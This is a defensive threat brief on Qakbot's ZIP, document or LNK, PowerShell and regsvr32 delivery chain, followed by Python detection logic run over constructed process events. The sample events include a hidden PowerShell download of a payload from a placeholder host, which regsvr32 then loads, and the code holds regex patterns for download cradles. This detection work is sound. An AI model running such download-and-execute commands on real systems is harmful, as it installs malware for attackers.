2022-07-19

Qakbot Attacks Increasing with the Use of New Techniques

Industry: N/A | Level: Tactical | Source: Zscaler

Zscaler's tracking of the Qakbot/Qbot malware shows an increase in Qakbot distribution, with new techniques, over the past six months. Zscaler describes how the threat actors' delivery methods have evolved: "Most recently, threat actors have transformed their techniques to evade detection by using ZIP file extensions, enticing file names with common formats, and Excel (XLM) 4.0 to trick victims into downloading malicious attachments that install Qakbot." Qakbot's initial access has typically involved a phishing email delivering a ZIP archive that contains a malicious Office document or LNK file, which in turn downloads the Qakbot DLL through PowerShell or curl. Native binaries such as regsvr32 or rundll32 are then used to execute the DLL. Once running, the malware injects itself into a process such as explorer.exe, establishes persistence with a scheduled task, and connects to its C2.

Anvilogic Scenario:

  • Qakbot/Qbot Zip/LNK File Delivery to Initial Infection
  • Malicious Document Delivering Malware

Anvilogic Use Cases:

  • Malicious Document Execution
  • Compressed File Execution
  • Symbolic OR Hard File Link Created
  • Invoke-WebRequest Command
  • regsvr32 Execution
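The delivery chain described above and the use cases listed here, expressed as detection logic and run over constructed Sysmon-style process-creation events. This is an added example, not code from Anvilogic or Zscaler: the hostnames, PIDs, file paths, process trees and the download URL are assumptions made for illustration, and the single-event rules (Office process opening a document, a path under the Explorer ZIP extraction folder, a PowerShell or curl download, regsvr32/rundll32 loading a DLL from a user-writable directory) are one reasonable reading of each use case, not Anvilogic's own rule content. The correlation step walks the parent/child ancestry of every loader hit so that a regsvr32 invocation is reported together with the archive, document and download stages that preceded it, while a regsvr32 call registering a DLL from Program Files on another host is ignored.

```python
"""
Stage-by-stage detection of the Qakbot ZIP -> document/LNK -> PowerShell/curl
-> regsvr32/rundll32 chain over constructed Sysmon-style process-creation
events. Each single-event rule maps to one use case on the page; detect()
then correlates the stages along the process ancestry of every loader hit.
"""
import re

# Constructed sample events (assumed Sysmon Event ID 1 fields). Hostnames,
# PIDs, paths and the URL are illustrative assumptions, not data from the page.
EVENTS = [
    {"host": "WS01", "pid": 1200, "ppid": 800,
     "image": r"C:\Windows\explorer.exe", "cmd": r'"C:\Windows\explorer.exe"'},
    {"host": "WS01", "pid": 1300, "ppid": 1200,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmd": r'"EXCEL.EXE" "C:\Users\alice\AppData\Local\Temp\Temp1_invoice_2031.zip\invoice_2031.xlsb"'},
    {"host": "WS01", "pid": 1400, "ppid": 1300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -nop -w hidden -c "Invoke-WebRequest http://example.invalid/img.dat -OutFile C:\ProgramData\img.dat"'},
    {"host": "WS01", "pid": 1500, "ppid": 1400,
     "image": r"C:\Windows\System32\regsvr32.exe", "cmd": r"regsvr32.exe -s C:\ProgramData\img.dat"},
    # Benign: an installer registering a vendor DLL from Program Files.
    {"host": "WS02", "pid": 2100, "ppid": 900,
     "image": r"C:\Windows\System32\regsvr32.exe", "cmd": r'regsvr32.exe /s "C:\Program Files\Vendor\comctl.dll"'},
    {"host": "WS02", "pid": 2200, "ppid": 900,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": r"powershell.exe Get-Process"},
]

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe"}
LOADER_IMAGES = {"regsvr32.exe", "rundll32.exe"}

DOC_ARG = re.compile(r"(?i)\.(docm?|xls[bmx]?|pptm?|lnk)\b")
# Explorer extracts a member to %TEMP%\TempN_<archive>.zip\ when it is opened
# straight from inside the ZIP, so that path marks "opened from an archive".
ARCHIVE_TEMP = re.compile(r"(?i)\\temp\\temp\d*_[^\\]+\.zip\\")
DOWNLOAD_CMD = re.compile(r"(?i)(invoke-webrequest|\biwr\b|\bcurl(\.exe)?\s|downloadfile|downloadstring)")
USER_WRITABLE = re.compile(r"(?i)\\(users\\[^\\]+\\appdata|programdata|users\\public|windows\\temp)\\")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def match_rules(ev):
    """Return the use-case names a single event satisfies, in chain order."""
    image, cmd = basename(ev["image"]), ev["cmd"]
    hits = []
    if image in OFFICE_IMAGES and DOC_ARG.search(cmd):
        hits.append("Malicious Document Execution")
    if ARCHIVE_TEMP.search(cmd):
        hits.append("Compressed File Execution")
    if image in SHELL_IMAGES and DOWNLOAD_CMD.search(cmd):
        hits.append("Invoke-WebRequest Command")   # curl downloads count too, per the page
    if image in LOADER_IMAGES and USER_WRITABLE.search(cmd):
        hits.append("regsvr32 Execution")          # DLL loaded from a user-writable path
    return hits


def ancestry(events, host, pid):
    """Process chain from the oldest known ancestor down to pid on one host."""
    by_pid = {(e["host"], e["pid"]): e for e in events}
    chain, seen, key = [], set(), (host, pid)
    while key in by_pid and key not in seen:   # stop at an unknown parent or a PID-reuse loop
        seen.add(key)
        chain.append(by_pid[key])
        key = (host, by_pid[key]["ppid"])
    return chain[::-1]


def detect(events):
    """Map host -> ordered stages for every loader hit, including upstream stages.

    A lone regsvr32 from a user-writable path is still reported (one stage);
    the full Qakbot chain yields all four use cases in delivery order.
    """
    findings = {}
    for ev in events:
        if "regsvr32 Execution" not in match_rules(ev):
            continue
        stages = []
        for anc in ancestry(events, ev["host"], ev["pid"]):
            for name in match_rules(anc):
                if name not in stages:
                    stages.append(name)
        findings[ev["host"]] = stages
    return findings


if __name__ == "__main__":
    for host, stages in detect(EVENTS).items():
        print(f"{host}: {len(stages)} stage(s) -> {' > '.join(stages)}")
```

On the sample data only WS01 is reported, with all four stages in delivery order; the WS02 regsvr32 call loads from Program Files and never enters the loader rule, so its PowerShell activity is not examined at all. In production the ancestry walk should use process GUIDs rather than PIDs, since PIDs are reused, and the user-writable path list should be extended to whatever the environment's download and extraction locations actually are.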
